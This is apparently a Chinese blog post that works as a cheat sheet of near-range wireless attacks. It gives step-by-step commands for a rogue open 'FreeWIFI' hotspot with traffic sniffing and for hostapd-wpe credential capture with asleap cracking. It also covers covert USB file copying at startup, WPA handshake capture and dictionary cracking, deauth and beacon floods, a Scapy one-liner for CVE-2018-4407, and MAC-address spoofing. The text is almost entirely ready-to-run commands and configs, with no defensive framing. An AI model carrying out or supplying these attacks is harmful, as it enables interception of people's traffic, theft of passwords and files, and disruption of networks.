钓鱼网络
Hostapd
>apt install hostapd dnsmasq
>cd /etc/hostapd
创建无加密热点
>vim open.conf
修改以下内容
Interface=wlan1
Ssid=FreeWIFI
Driver=nl80211
Channel=1
Hw_mode=g
修改dns配置
>vim /etc/dnsmasq.conf
Dhcp-range=10.0.0.1, 10.0.0.255,12h
Interface=wlan1
重启应用配置
>systemctl restart dnsmasq
消除网卡限制
>nmcli radio wifi off
>rfkill unblock wlan
>ifconfig wlan1 10.0.0.1/24
>hostapd open.conf
嗅探
>sysctl –w net.ipv4.ip_forward=1
>iptables –t nat –A POSTROUTING –o 网卡 –j MASQUERADE
>bettercap –iface wlan1
>net.show
>net.sniff on
>driftnet –i wlan1
Hostapd-wpe
>apt install hostapd-wpe
>vim /etc/hostapd-wpe/hostapd-wpe.conf
配置
interface=wlan1
Ssid=
Channel=
证书修改
>cd /etc/hostapd-wpe/certs/
文件ca.cnf server.cnf client.cnf
修改countrName stateOrProvinceName localityName …….
>rm –rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
>make clean
>./bootstrap
>make install
执行创建热点
>hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
获取到密码时使用asleep破解
>asleap –C Challenge值 –R response值 –W 字典文件
BadUSB
USBCopyer
USBCopyer 是一个开源工具,专为自动化备份或复制插入的U盘中的文件而设计。它可以按需执行复制操作,支持多种定制策略,如扩展名过滤、磁盘黑白名单以及隐藏模式。
https://github.com/kenvix/USBCopyer
双击下载的 USBCopyer.exe 文件来启动程序。 设置参数:右键点击系统托盘区域的图标,选择“设置”以调整复制规则。 启动隐藏模式:若要让USBCopyer在后台运行,启动时添加 /hide 参数
USBCopyer.exe /hide
开机启动:为了使USBCopyer在每次开机时自动运行,你可以将上述命令行添加到启动项。
WI-FI破解
wifite
Kali下工具wifite,加载网卡,开启监听模式,#airmon-ng check kill
>airmon-ng start wlan1
安装hcxtools v4.2.0或更高版本,hcxdumptool v4.2.0或更高版本
>apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
>git clone https://github.com/ZerBea/hcxtools
>cd hcxtools
>make
>make install
>git clone https://github.com/ZerBea/hcxdumptool
>cd hcxdumptool
>make
>make install
>wifite –-dict /root/Desktop/wordlist.txt 加载
Aircrack-ng
>airmon-ng start wlan0 开启监听模式
>airodump-ng wlan0mon 查看数据包
>airodump-ng –c 1 –bssid APmac –w name wlan1mon保存某AP数据包
>aireplay-ng –deauth 10 –a APmac wlan0mon deauth攻击
>aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon deauth #攻击某个设备直至获取handshake(握手包)
>airmon-ng stop wlan0mon #关闭监听模式
>aircrack-ng –w wordlist.txt name.cap #指定字典破解密码
无线干扰
Beacon flood
需切换网卡为监听模式
>airmon-ng start wlan1
创建大量虚假热点Mdk3 mon0 b
>mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500
Deauth flood
针对AP
>airmon-ng start wlan1
>aireplay-ng –deauth 10 –a AP's mac address mon0
针对AP内设备
>airmon-ng start wlan1 #将网卡置为监听模式
>airodump-ng wlan1mon –bssid #目标ap的ssid
>aireplay-ng -0 0 -a ap的ssid -c AP的ssid wlan0mon #开始攻击#
Mdk3 destruction
针对范围内
>mdk3 wlan1mon d
针对AP
>airodump-ng wlan1mon
>mdk3 wlan1mon a -a APmac 发起攻击
黑名单
>mdk3 wlan1mon d –c 信道 –b /blacklist.txt.
>mdk3 wlan1mon b -n test -w -g -c 1 -s 200
WiFi芯片esp8266
Mdk4
>mdk4 wlan0mon d
CVE-2018-4407
Scapy
send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复) Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复) Apple OS X El Capitan及更早版本:所有设备
绕过mac地址认证
Ifconfig
>ifconfig wlan1 down
>ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx
>ifconfig wlan1 up
Macchanger
>macchanger –m xx:xx:xx:xx:xx:xx wlan1
>macchanger –r wlan1
标签:WEB,近源,hostapd,ng,xx,wlan1,wpe,wlan1mon,合集
From: https://blog.csdn.net/qq_59468567/article/details/141130468